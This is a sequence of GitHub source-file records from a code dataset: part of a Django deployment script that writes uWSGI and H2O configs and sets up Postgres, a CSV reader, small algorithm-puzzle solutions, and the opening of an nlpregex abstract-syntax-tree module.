requirements with pip\n subprocess.check_call([python_bin, \"-m\", \"pip\", \"install\", \"-r\", \"requirements.txt\"])\n\n # Install django-mozumder into environment in develop mode if needed\n if develop_path:\n print('Installing django-mozumder into development path')\n os.system(f'source {venv_bin}/activate;cd {develop_path};{python_bin} {develop_path}/setup.py develop')\n \n# import pip._internal.main\n# pip._internal.main.main(['install', '--isolated', '-r', 'requirements.txt'])\n\n if args.create_uwsgi == True:\n createuwsgi(args,use_secret_key=secret_key)\n\n if args.create_h2o == True:\n createh2o(args)\n \n if args.create_db == True:\n psql_base_command = f'PGPASSWORD={db_admin_password} psql -X --echo-all '\n psql_command = f\"CREATE ROLE {db_username} WITH LOGIN PASSWORD '{db_password}';\"\n command = f'{psql_base_command} -U {db_admin_username} -c \"{psql_command}\"'\n os.system(command)\n createdb_command = f'PGPASSWORD={db_admin_password} createdb --echo -U {db_admin_username} -O {db_username} {db_name}'\n os.system(createdb_command)\n psql_command = f\"CREATE EXTENSION pgcrypto;\"\n command = f'{psql_base_command} -U {db_admin_username} {db_name} -c \"{psql_command}\"'\n os.system(command)\n migrate_command = f'PREPARED_STATEMENTS=False manage.py migrate'\n os.system(migrate_command)\n\n print('Collecting Static Files')\n subprocess.run(['manage.py', 'collectstatic', '--noinput'])\n\ndef createuwsgi(args, use_secret_key=None):\n\n project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color = process_args(args)\n \n venv = os.path.join(venv_path,project_name)\n\n if use_secret_key:\n secret_key = use_secret_key\n processes = args.uwsgi_processes\n threads = args.uwsgi_threads\n \n http_socket = ''\n for http_socket_host in args.uwsgi_http_sockets:\n http_socket += 'http-socket = ' + http_socket_host + '\\n'\n\n target_filename = os.path.join(target_root, 'uwsgi.ini')\n f = open(target_filename, 'w')\n f.write(\nf\"\"\"[uwsgi]\nhome = {venv_path}\nchdir = {target_root}\napp = {project_name}\nbase = %v\nmodule = %(app).wsgi:application\nsocket = {uwsgi_run_dir}/%(app).uwsgi.sock\nfastcgi-socket = {uwsgi_run_dir}/%(app).fastcgi.sock\nwsgi-file = %(base)/%(app)/wsgi.py\n\nenv = DJANGO_SETTINGS_MODULE={project_name}.settings\nenv = DJANGO_SECRET_KEY='{secret_key}'\nenv = DJANGO_DEBUG=False\n{ 'env = DB_HOST=' + db_host if db_host else '' }\n{ 'env = DB_PORT=' + db_port if db_port else '' }\n{ 'env = DB_NAME=' + db_name if db_name else '' }\n{ 'env = DB_USERNAME=' + db_username if db_username else '' }\n{ \"env = DB_PASSWORD='\" + db_password + \"'\" if db_password else '' }\nenv = PYTHONPYCACHEPREFIX=~/.pycache\nenv = ALLOWED_HOSTS={ allowed_hosts }\nenv = LOG_DIR={ log_dir }\nenv = STATIC_DIR={ static_dir }\nenv = MEDIA_DIR={ media_dir }\nprocesses = {processes}\nthreads = {threads}\nimport = analytics.apps\n{http_socket}\n#mule = analytics/management/utilities/log_mule.py\n#mule = mozumder/management/utilities/cache_mule.py\nfarm = logger:1\nfarm = cache:2\n#import = analytics.apps\n#import = mozumder.apps\nstats = {uwsgi_run_dir}/%(app).stats.sock\nlogger = file:{uwsgi_log_dir}/%(app).log\nreq-logger = file:{uwsgi_log_dir}/%(app).access\nlog-format = %(ftime) %(pid):%(core):%(switches) %(addr) %(user) %(proto) %(referer) %(method) %(uri) %(status) %(rsize)b %(micros)us (%(vars)v, %(pktsize)b) (%(headers)h, %(hsize)b) \"%(uagent)\"\nlog-date = %%Y-%%m-%%d %%H:%%M:%%S\nlogformat-strftime\n\n[uwsgi]\nchmod-socket = 660\nmaster = true\ndie-on-term = true\nno-orphans = true\nvacuum = true\nauto-procname = true\nthreaded-logger = true\nenable-threads = true\nno-threads-wait = true\nprocname-prefix = %(app).\n\"\"\")\n f.close()\n\ndef createh2o(args):\n\n project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color = process_args(args)\n \n\n domainname = args.domainname\n hostname = args.hostname\n redirects = args.redirects\n letsencrypt_dir = args.letsencrypt_dir\n h2o_log_dir = args.h2o_log_dir\n h2o_access_log = os.path.join(h2o_log_dir,project_name + '.log')\n well_known_dir = os.path.join(target_root,'.well-known')\n uwsgi_fcgi_socket = os.path.join(uwsgi_run_dir,project_name + '.fastcgi.sock')\n\n robots_txt_file = os.path.join(static_path,'robots.txt')\n manifest_json_file = os.path.join(static_path,'manifest.json')\n browserconfig_xml_file = os.path.join(static_path,'browserconfig.xml')\n icon_path = os.path.join(static_path,'icon')\n favicon_ico_file = os.path.join(icon_path,'icon-16.png')\n android_icon_192x192_png_file = os.path.join(icon_path,'icon-192.png')\n apple_icon_180x180_png_file = os.path.join(icon_path,'icon-180.png')\n favicon_16x16_png_file = os.path.join(icon_path,'icon-16.png')\n favicon_32x32_png_file = os.path.join(icon_path,'icon-32.png')\n favicon_96x96_png_file = os.path.join(icon_path,'icon-96.png')\n\n if domainname == None:\n raise Exception('Need a domain name when creating H2O config file. Please set --domainname')\n if hostname == None:\n raise Exception('Need a host name when creating H2O config file. Please set --hostname')\n\n first_temp_redirect = ''\n additional_temp_redirects = ''\n domain_redirect = ''\n if redirects:\n first = True\n for redirect in redirects:\n if first:\n first = False\n # first item\n first_temp_redirect = f\"\"\"\"{redirect}:80\": &temp_redirect\n <<: *default_redirect\n paths: &temp_paths\n \"/\":\n redirect:\n status: 302\n url: \"https://{hostname}/\\\"\"\"\"\n else:\n # other items\n additional_temp_redirects += f'\"{redirect}:80\": *temp_redirect\\n'\n if domainname != None:\n domain_redirect = f'\"{domainname}:80\": *default_redirect'\n\n cipher = \"\"\"minimum-version: TLSv1.2\ncipher-suite: ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256\ncipher-preference: server\"\"\"\n certificate_file = os.path.join(letsencrypt_dir, domainname, \"fullchain.pem\")\n key_file = os.path.join(letsencrypt_dir, domainname, \"privkey.pem\")\n\n first_temp_ssl_redirect = ''\n additional_temp_ssl_redirects = ''\n domain_ssl_redirect = ''\n if redirects:\n first = True\n for redirect in redirects:\n if first:\n first = False\n # first item\n first_temp_ssl_redirect = f\"\"\"\"{redirect}:443\": &temp_ssl_redirect\n <<: *ssl_redirect\n paths: &temp_paths\n \"/\":\n redirect:\n status: 302\n url: \"https://{hostname}/\\\"\"\"\"\n else:\n # other items\n additional_temp_ssl_redirects += f'\"{redirect}:443\": *temp_redirect\\n'\n if domainname != None:\n domain_ssl_redirect = f'\"{domainname}:80\": *default_redirect'\n\n target_filename = os.path.join(target_root, 'h2o.conf')\n f = open(target_filename, \"w\")\n f.write(f\"\"\"{hostname}:80\": &default_redirect\n listen:\n port: 80\n paths: &default_paths\n \"/\":\n redirect:\n status: 301\n url: \"https://{hostname}/\"\n \"/.well-known\": &well_known\n file.dir: {well_known_dir}\n{first_temp_redirect}\n{additional_temp_redirects}\n{domain_redirect}\n\n\"{domainname}:443\": &ssl_redirect\n <<: *default_redirect\n listen: &default_ssl\n port: 443\n ssl:\n {cipher}\n certificate-file: {certificate_file}\n key-file: {key_file}\n{first_temp_ssl_redirect}\n{additional_temp_ssl_redirects}\n\"{hostname}:443\":\n access-log:\n path: {h2o_access_log}\n format: \"%{{%Y-%m-%d %H:%M:%S}}t.%{{msec_frac}}t %h:%{{remote}}p %H %{{Referer}}i %m %U%q %s %bb %{{duration}}xs (%{{connect-time}}xs, %{{request-total-time}}xs, %{{process-time}}xs, %{{response-time}}xs) \\\"%{{user-agent}}i\\\"\"\n listen: *default_ssl\n paths:\n <<: *default_paths\n \"/\": &{project_name}_socket\n fastcgi.connect:\n port: {uwsgi_fcgi_socket}\n type: unix\n \"/{static_url}\":\n file.dir: {static_path}\n expires: 30 day\n file.send-compressed: ON\n \"/{media_url}\":\n file.dir: {media_path}\n expires: 30 day\n \"/{admin_url}\": *{project_name}_socket\n /robots.txt: &default_file\n file.file: {robots_txt_file}\n file.send-compressed: ON\n expires: 30 day\n /manifest.json:\n <<: *default_file\n file.file: {manifest_json_file}\n /browserconfig.xml:\n <<: *default_file\n file.file: {browserconfig_xml_file}\n /favicon.ico:\n <<: *default_file\n file.file: {favicon_ico_file}\n /android-icon-192x192.png:\n <<: *default_file\n file.file: {android_icon_192x192_png_file}\n /apple-icon-180x180.png:\n <<: *default_file\n file.file: {apple_icon_180x180_png_file}\n /favicon-16x16.png:\n <<: *default_file\n file.file: {favicon_16x16_png_file}\n /favicon-32x32.png:\n <<: *default_file\n file.file: {favicon_32x32_png_file}\n /favicon-96x96.png:\n <<: *default_file\n file.file: {favicon_96x96_png_file}\n\"\"\")\n f.close()\n","repo_name":"mozumder/django-mozumder","sub_path":"mozumder/management/shell/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":32693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37941216566","text":"import collections\nimport csv\nimport re\n\n\n__all__ = (\n \"CsvReader\",\n)\n\n\nclass CsvReader(object):\n \"\"\"\n This object reads `fname`, a csv file, and can iterate over the rows.\n\n Usage:\n\n for row in CsvReader(fname):\n assert isinstance(row, OrderedDict)\n ... process the row\n\n `fname` is either a filename, an open file object, or any object suitable\n for `csv.reader`.\n\n The first row is expected to be a list of column names.\n These are converted to \"canonical\" form by get_name()\n and stored in the self.attributes list.\n\n Subsequent rows are converted by get_row()\n into OrderedDicts based on the keys in self.attributes.\n\n - get_name(name): returns the \"canonical\" name (if overriden)\n The default returns name unchanged.\n \"\"\"\n\n def __init__(self, fname):\n self.fname = fname\n self.attributes = []\n self.reader = None\n\n def __iter__(self):\n if not self.attributes:\n self.load_attributes()\n for row in self.reader:\n yield self.get_row(row)\n\n def get_name(self, name):\n return name\n\n @staticmethod\n def get_reader(fname):\n fi = open(fname, 'rU') if isinstance(fname, str) else fname\n filtered = (re.sub(r'(\\r\\n)|(\\r)', r'', line) for line in fi)\n if hasattr(fname, 'seek'):\n fname.seek(0)\n return csv.reader(filtered)\n\n def get_row(self, row):\n return collections.OrderedDict(zip(\n self.attributes,\n [x.strip() for x in row]))\n\n def load_attributes(self):\n if not self.reader:\n self.load_reader()\n self.attributes = [self.get_name(c) for c in self.reader.next()]\n\n def load_reader(self):\n self.reader = self.get_reader(self.fname)\n","repo_name":"wfclark/ACE","sub_path":"prometheus-rios.conversion-efd445830c1e/src/rios/conversion/utils/csv_reader.py","file_name":"csv_reader.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2136428912","text":"# Programmers JoyStick\n\n# 조이스틱을 왼쪽으로 옮겼을 때 소요 비용과 인덱스 반환\ndef go_left(index, name):\n cnt = 0\n while True:\n index -= 1\n cnt += 1\n if index == -1:\n index = len(name)-1\n if name[index]:\n break\n return cnt, index\n\n# 조이스틱을 오른쪽으로 옮겼을 때 소요 비용과 인덱스 반환\ndef go_right(index, name):\n cnt = 0\n while True:\n index += 1\n cnt += 1\n if index == len(name):\n index = 0\n if name[index]:\n break\n return cnt, index\n\ndef solution(name):\n name = list(name)\n\n # name을 배열로 변환 후 소요 비용 전 처리\n for i in range(len(name)):\n if ord(name[i]) - 65 > 13:\n name[i] = abs(ord(name[i]) - 65 - 26)\n else:\n name[i] = ord(name[i]) - 65\n answer = 0\n index = 0\n\n while True:\n answer += name[index]\n name[index] = 0\n\n # name의 모든 요소가 0가 되면 while문 탈출\n if sum(name) == 0:\n break\n\n left = go_left(index, name)\n right = go_right(index, name)\n\n if left[0] >= right[0]:\n answer += right[0]\n index = right[1]\n else:\n answer += left[0]\n index = left[1]\n\n return answer\n\nprint(solution('JEROEN'))","repo_name":"woosteelz/AlgorithmPrac","sub_path":"Programmers/PG_JoyStick.py","file_name":"PG_JoyStick.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898587887","text":"# https://leetcode.com/problems/shortest-path-in-binary-matrix/description/\n\nimport collections\n\n# BFS 8 directions, TC:O(N^2), SC:O(N^2)\ndef shortestPathBinaryMatrix(grid: List[List[int]]) -> int:\n if grid[0][0] == 1: return -1\n queue = collections.deque([((0, 0), 1)])\n grid[0][0] = 1\n n = len(grid)\n while queue:\n (r, c), step = queue.popleft()\n if (r, c) == (n - 1, n - 1): return step\n for ro, co in ((1, 0), (0, 1), (-1, 0), (0, -1), (1, 1), (-1, 1), (1, -1), (-1, -1)):\n rn, cn = r + ro, c + co\n if rn < 0 or cn < 0 or rn >= n or cn >= n or grid[rn][cn] == 1:\n continue\n grid[rn][cn] = 1\n queue.append(((rn, cn), step + 1))\n return -1","repo_name":"ychanc2104/LeetCode","sub_path":"Shortest Path in Binary Matrix.py","file_name":"Shortest Path in Binary Matrix.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27967409526","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n# import datetime\n\n# a = datetime.datetime(year=2023,month=4,day=29,hour=13)\n# b = datetime.datetime.now()\n# print(b-a)\n\n#https://www.acmicpc.net/problem/17087\n# import math\n# l,x = wow()\n# n_list = sorted(list(wow()))\n# gap_list = []\n# for n in n_list:\n# gap_list.append(abs(n-x))\n# while len(gap_list)>=2:\n# a,b = gap_list.pop(),gap_list.pop()\n# gap_list.append(math.gcd(a,b))\n# print(gap_list[0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/5월/30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31164170451","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\nfrom graphviz import Digraph\n\nimport nlpregex.abs_graph.double_link\nimport nlpregex.abs_graph.node\nimport nlpregex.abs_graph.edge\nimport nlpregex.abs_graph.graph\n\nfrom nlpregex.regular_language import fa\n\n\n# AST: abstract syntax tree.\n# inherited from nlpregex.abs_graph.RootedTree.\n# at each node, the children are specified by\n# the out-neighbors.\n# it uses ASTNode and ASTEdge\n#\n# It is constructed by nlpregex.regular_language.lark_parser.LarkParser\n# or any other parsers.\n#\n# Supported operations\n# ---------------------\n#\n# - AST.clone() \n#\n# returns a self-copy.\n#\n#\n# - AST.flatten_children()\n#\n# flatten reduce the depth of the tree by aggregating the\n# consecutive occurrence of sequence or union.\n#\n# Ex. s s\n# / \\ |\n# / \\ +--+-+-+--+\n# / \\ | | | |\n# s u => t1 t2 t3 u \n# / \\ / \\ |\n# t1 s t4 u +--+--+\n# / \\ / \\ t4 t5 t6\n# t2 t3 t5 t6\n#\n#\n# - AST.count_phrases()\n#\n# at each ASTNode, count the maximum number of phrases the subtree from the node represents.\n# repeat node's count is considered 1.\n# nonterminals are considered to have count 1.\n# if you want to take the subexpression for the nontermnals into counting, then\n# those have to be expanded in the tree.\n#\n#\n# - AST.expand_phrases()\n#\n# returns a maximal set of flattened phrases this tree represents.\n# repeat nodes either of finite or infinite, will not be expanded.\n# if the repeat node has only one child and if it is nonterminal, then\n# it will be peresented as \"!repeat(, ,).\n# otherwise, it will be given as \"!repeat(___exp___, , )\".\n#\n# \n# - AST.replace_finite_repeat_with_union()\n#\n# updates the tree by replacing the finite repeats nodes with \n# union of repeated sequences.\n#\n# ex.) (ab){0,4} => | (ε | ab | abab | ababab | abababab )\n#\n#\n# - AST.expand_nonterminals( nonterminals, trees )\n#\n# expand the nonterminals with the corresponding subtrees.\n# if there is cycle, the behavior is undefined.\n#\n# @param nonterminals_expanded : list of nonterminals to be expanded\n# @param trees : dictionary {k: nonterminal v: AST}\n# \n# ex.) aabbcc

dd, : eee, : fff\n# => aaeefffebbfffcceefffedd\n# If there is a self-reference, the behavior is undefined.\n#\n#\n# - AST.generate_fst ( generate_out_tokens=True )\n#\n# generates a finiste state automaton from this AST.\n#\n# @param generate_out_tokens : Set to True, if you want to decode the input\n# with a finite state transducer.\n# Set to False, if you just want to accept/reject\n# the input with a finite state automaton. \n#\n#\n# - AST.draw( self, tree_name )\n#\n# generates a pdf or svg file to visualise this AST.\n# It uses graphviz. The filename for the svg is specified by \"tree_name\"\n#\n# @param tree_name : output file name\n# @param view_now : True/False launch viewer immediately\n# @param out_format : 'svg' or 'pdf'. Use 'svg' if window's PDF renders\n# messes up UTF-8.\n# @param orientagion: 'vertical' or 'horizontal'. top to bottom or left to right.\n# specifies the direction of \n# the tree from the root toward children.\n#\n#\n\n\n# ASTNode: \n#\n# ast_node_type:\n# terminal - terminal symbol\n# the \"content\" member represents the string.\n#\n# nonterminal - non-terminal symbol\n# The \"content\" member represents the string.\n#\n# epsilon - indicates epsilon transiton\n#\n# sequence - concatenation\n#\n# union - selection (pipe)\n#\n# infinite repeat\n# - represents infinite repeat\n# repeat_min is either 1 or 0.\n# repeat_max is -1, which means inifinity.\n#\n# finite repeat\n# - represents finite repeat\n# repeat_min and repeat_max indicates\n# the range of repeatition.\n#\n# phrase_count: the maximum number of combinations of the phrases that the subtree from this node represents\n# the count for the repeat node is considered to be 1.\n#\n# text_width: the length of the text in the regular subexpression this node represents.\n# it is used to format and indent the expression into a pretty text.\n#\n# out_token_pre: list of out_token for the transducer.\n# the later in the list, more outword in the transducer\n#\n# out_token_post: list of out_token for the transducer\n# the later in the list, more outword in the transducer\n#\n# ASTEdge: directed edge used in AST. it does not carry any information.\n# \n\n\n\n\n\n\n\n\n# @brief\n# make concatenate an item in list1 and an item in list2 \n# with the specified delimiter in between.\n#\n# ex.)\n# list1 = { \"str1\", \"str2\", \"str3\" }\n# list2 = { \"str4\", \"str5\", \"str6\" }\n# delim = \" \"\n#\n# return:\n# { \"str1 str4\", \"str1 str5\", \"str1 str6\",\n# \"str2 str4\", \"str2 str5\", \"str2 str6\",\n# \"str3 str4\", \"str3 str5\", \"str3 str6\" }\n#\n# if both are empty, it returns an empty list.\n# if either is empty, then it returns the other.\n# when concatenating two strings, if either of them are empty, \n# then no delimiter is inserted.\n# i.e.) '' + 'a' => 'a' (not 'a' )\n\ndef cross_product ( list1, list2, delim ):\n\n list_out = []\n\n if len(list1) == 0:\n return list2\n\n elif len(list2) == 0:\n return list1\n\n else:\n for e1 in list1:\n for e2 in list2:\n if e1 != '':\n if e2 != '':\n list_out.append( e1 + delim + e2 )\n else:\n list_out.append( e1 )\n else:\n if e2 != '':\n list_out.append( e2 )\n else:\n list_out.append( '' )\n\n return list_out\n\n\n\n# @brief create a sequence node over two children\n#\n# @param left_child: left child\n# @param right_child: right child\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_sequence_subtree( left_child, right_child, ast ):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'sequence', '' )\n new_node.add_to_graph( ast )\n\n # left first, and then right. order is important\n\n left_edge = nlpregex.regular_language.ast.ASTEdge()\n left_edge.add_to_graph( ast, new_node, left_child, dir=\"directed\" )\n\n right_edge = nlpregex.regular_language.ast.ASTEdge()\n right_edge.add_to_graph( ast, new_node, right_child, dir=\"directed\" )\n\n return new_node\n\n\n\n# @brief create a union node over two children\n#\n# @param left_child: left child\n# @param right_child: right child\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_union_subtree( left_child, right_child, ast ):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'union', '' )\n new_node.add_to_graph( ast )\n\n # left first, and then right. order is important\n\n left_edge = nlpregex.regular_language.ast.ASTEdge()\n left_edge.add_to_graph( ast, new_node, left_child, dir=\"directed\" )\n\n right_edge = nlpregex.regular_language.ast.ASTEdge()\n right_edge.add_to_graph( ast, new_node, right_child, dir=\"directed\" )\n\n return new_node\n\n\n\n\n# @brief create a finite repeat node over a child.\n#\n# @param child_node: child node\n# @param repeat_min: minimum repetition\n# @param repeat_max: maximum repetition\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_finite_repeat_subtree( child_node, repeat_min, repeat_max, ast ):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'finite repeat', '' )\n new_node.add_to_graph( ast )\n\n new_node.set_repeat( repeat_min, repeat_max )\n\n new_edge = nlpregex.regular_language.ast.ASTEdge()\n new_edge.add_to_graph( ast, new_node, child_node, dir=\"directed\" )\n\n return new_node\n\n\n# @brief create a infinite repeat node over a child.\n#\n# @param child_node: child node\n# @param rtype: 'PLUS' or 'STAR'\n# @param ast: AST to which this node is added.\n#\n# @return new node created.\ndef create_infinite_repeat_subtree( child_node, rtype, ast ):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'infinite repeat', '' )\n new_node.add_to_graph( ast )\n\n if rtype == 'STAR':\n new_node.set_repeat( 0, -1 )\n\n elif rtype == 'PLUS':\n new_node.set_repeat( 1, -1 )\n\n new_edge = nlpregex.regular_language.ast.ASTEdge()\n new_edge.add_to_graph( ast, new_node, child_node, dir=\"directed\" )\n\n return new_node\n\n\nclass ASTNode(nlpregex.abs_graph.node.BaseNode):\n\n\n def __init__( self, ast_node_type, content):\n\n super().__init__()\n\n self.ast_node_type = ast_node_type \n self.content = content\n self.repeat_min = 1\n self.repeat_max = 1\n self.phrase_count = 1\n self.text_width = 0\n self.out_token_pre = [] # later in the list, the closer to the root of AST\n self.out_token_post = [] # later in the list, the closer to the root of AST\n\n\n def set_repeat( self, b, e ):\n self.repeat_min = b\n self.repeat_max = e\n\n\n def append_out_token_pre(self, t):\n self.out_token_pre.append(t)\n\n\n def append_out_token_post(self, t):\n self.out_token_post.append(t)\n\n\n def get_children( self ):\n return [ e.other_node_of( self ) for e in self.out_neighbors() ]\n\n\n def get_parent( self ):\n if len(self.in_neighbors())==1:\n return self.in_neighbors()[0].other_node_of( self )\n else:\n return None\n\n\n # @virtual\n # @brief deep copies the contents from the other node\n def copy_from( self, n ):\n self.ast_node_type = n.ast_node_type\n self.content = n.content\n self.repeat_min = n.repeat_min\n self.repeat_max = n.repeat_max\n self.phrase_count = n.phrase_count\n self.text_width = n.text_width\n self.out_token_pre = list( n.out_token_pre )\n self.out_token_post = list( n.out_token_post )\n\n\n # @virtual\n # @brief reset the values of the node, keeping it in the tree\n def reset( self ):\n self.ast_node_type = '' # Must be filled immediately after this call\n self.content = ''\n self.repeat_min = 1\n self.repeat_max = 1\n self.phrase_count = 1\n self.text_width = 0\n self.out_token_pre = []\n self.out_token_post = []\n\n\n # @virtual\n # @brief returns true if this node can be removed to flatten the tree.\n def can_be_flattened(self):\n return len(self.out_token_pre) == 0 and len(self.out_token_post) == 0\n\n\n # @virtual\n # @brief\n # returns a string if the node has other string to be added before and after\n # for generating expanded phrases.\n #\n # @param id: unique number assigned to each invocation of a pair of those calls\n # the callee can use this to emit unique string.\n def attribute_for_expansion_before( self, id ):\n if len(self.out_token_pre) > 0:\n rev = list( reversed(self.out_token_pre) )\n content = ' '.join( rev )\n return '[ ' + content + ' ]'\n else:\n return ''\n\n def attribute_for_expansion_after ( self, id ):\n if len(self.out_token_post) > 0:\n content = ' '.join(self.out_token_post)\n return '[ ' + content + ' ]'\n else:\n return ''\n\n\n # @virtual\n # @brief\n # returns a string if the node has other string to be added before and after\n # for emiiting formatted rules.\n def prologue_for_formatted_text(self):\n if len(self.out_token_pre) > 0:\n rev = list( reversed(self.out_token_pre) )\n content = ' '.join( rev )\n return '[ ' + content + ' ]'\n else:\n return ''\n\n def epilogue_for_formatted_text(self):\n if len(self.out_token_post) > 0:\n content = ' '.join(self.out_token_post)\n return '[ ' + content + ' ]'\n else:\n return ''\n\n\n # @virtual\n # @brief\n # returns a list of extra out_tokens for the epsilon transitions \n # prepended and appended to the main transition.\n #\n def extra_epsilon_nodes_before (self):\n\n rev = list( reversed( self.out_token_pre ) )\n\n return ' '.join( rev )\n\n def extra_epsilon_nodes_after (self):\n\n return ' '.join( self.out_token_post )\n\n\n # @virtual\n # @brief\n # returns the in_token and out_token for the main transition\n def node_content_for_fst_main(self, id):\n return (self.content, '')\n\n\n # @virtual\n # @brief\n # saves the attributes of this node to be removed.\n # used when a nonterminal node is replaced with a subtree.\n # saved attributes are merged to the replacing node\n #\n # @return attributes saved\n def save_attributes(self):\n return ( self.out_token_pre, self.out_token_post )\n\n # @virtual\n # @brief\n # merges saved attributes to this node.\n # used when a nonterminal node is replaced with a subtree.\n #\n # @param attributes returned by saved_attributes\n def merge_attributes(self, saved_attrib):\n\n for t in saved_attrib[0]:\n self.out_token_pre.append(t)\n\n for t in saved_attrib[1]:\n self.out_token_post.append(t)\n\n\n # @virtual\n # @brief\n # returns a string to be used a a node label for graphviz\n # \n # @param show_attributes : display attributes.\n #\n # @return (string to be shown, True/False) \n # The 2nd param shows if the children must be \n # visited or not.\n def generate_string_for_drawing(self, show_attributes):\n\n label_out = \"\"\n should_visit_children = True\n if self.ast_node_type == 'terminal':\n label_out += self.content.replace('\"','')\n\n elif self.ast_node_type == 'nonterminal':\n label_out += self.content.replace('\"','')\n\n elif self.ast_node_type == 'epsilon':\n label_out += \"ε\"\n\n elif self.ast_node_type == 'sequence':\n if self.are_children_all_terminals(show_attributes):\n should_visit_children = False\n label_out += self.aggregate_child_labels()\n else:\n label_out += \"SEQ\"\n\n elif self.ast_node_type == 'union':\n label_out += \"|\"\n\n elif self.ast_node_type == 'infinite repeat':\n if self.repeat_min == 0:\n label_out += \"*\"\n else:\n label_out += \"+\"\n\n elif self.ast_node_type == 'finite repeat':\n label_out += ( \"{ \" + str(self.repeat_min) + \", \" + str(self.repeat_max) + \" }\" )\n\n if self.phrase_count > 1:\n label_out += ( ' (' + str(self.phrase_count) + ')' )\n\n if show_attributes:\n\n prologue = self.prologue_for_formatted_text()\n if prologue != '':\n label_out = prologue + ' ' + label_out \n\n epilogue = self.epilogue_for_formatted_text()\n if epilogue != '':\n label_out = label_out + ' ' + epilogue\n\n return '\"' + label_out + '\"', should_visit_children\n\n\n # @brief subroutine for generate_string_for_drawing()\n # if there is no children, return False.\n # @param show_attributes : display attributes.\n def are_children_all_terminals(self, show_attributes):\n \n children = [ e.other_node_of( self ) for e in self.out_neighbors() ]\n\n if len(children) == 0:\n return False\n\n for c in children:\n if c.ast_node_type != 'terminal':\n return False\n\n if show_attributes:\n attr_str = c.prologue_for_formatted_text() + c.epilogue_for_formatted_text()\n if attr_str != '':\n return False\n\n return True\n\n\n # @brief subroutine for generate_string_for_drawing()\n def aggregate_child_labels(self):\n\n out_str = ''\n \n children = [ e.other_node_of( self ) for e in self.out_neighbors() ]\n first = True\n for c in children:\n if first:\n first = False\n else:\n out_str += ' '\n \n out_str += c.content.replace('\"','')\n\n return out_str\n\n\n # @brief diag string\n def __str__(self):\n\n out_str = \"Type: [\"\n out_str += self.ast_node_type\n out_str += \"] Token: [\"\n out_str += self.content\n out_str += \"] Repeat: (\"\n out_str += str(self.repeat_min)\n out_str += \", \"\n out_str += str(self.repeat_max)\n out_str += \") Count: \"\n out_str += str (self.phrase_count)\n out_str += \" Text Width: \"\n out_str += str (self.text_width)\n out_str += \" Out Token Pre: [\"\n out_str += self.prologue_for_formatted_text()\n out_str += \"] Out Token Post: [\"\n out_str += self.epilogue_for_formatted_text()\n out_str += \"]\"\n return out_str\n\n\n\n\n\n\nclass ASTEdge(nlpregex.abs_graph.edge.BaseEdge):\n\n def __init__(self):\n super().__init__()\n\n\n\n\n\n\n\nclass AST(nlpregex.abs_graph.graph.RootedTree):\n\n\n def __init__(self):\n super().__init__()\n self.node_attribute_id_next = 0\n\n\n\n # @public\n # @brief incidence oder preserving clone\n def clone( self ):\n\n gclone = AST();\n\n node_id = 1\n\n id_to_clone_node = {}\n\n for n in self.nodes():\n\n nclone = type(n)(\"\",\"\") # subclass of ASTNode\n nclone.copy_from(n)\n\n n.node_id = node_id\n nclone.node_id = node_id\n\n id_to_clone_node[node_id] = nclone\n\n nclone.add_to_graph(gclone)\n\n if n == self.root:\n gclone.add_root(nclone)\n\n node_id += 1\n\n\n for n in self.nodes():\n\n src_clone = id_to_clone_node[n.node_id]\n\n for c in [ e.other_node_of(n) for e in n.out_neighbors() ]:\n\n dst_clone = id_to_clone_node[c.node_id] \n\n eclone = ASTEdge() \n eclone.add_to_graph( gclone, src_clone, dst_clone, \"directed\" )\n\n for n in self.nodes():\n delattr( n, 'node_id' )\n\n for n in gclone.nodes():\n delattr( n, 'node_id' )\n\n\n return gclone\n\n\n\n ########################################\n # #\n # remove & clone subtree #\n # #\n ########################################\n\n # @public\n # @brief remove subtree from this 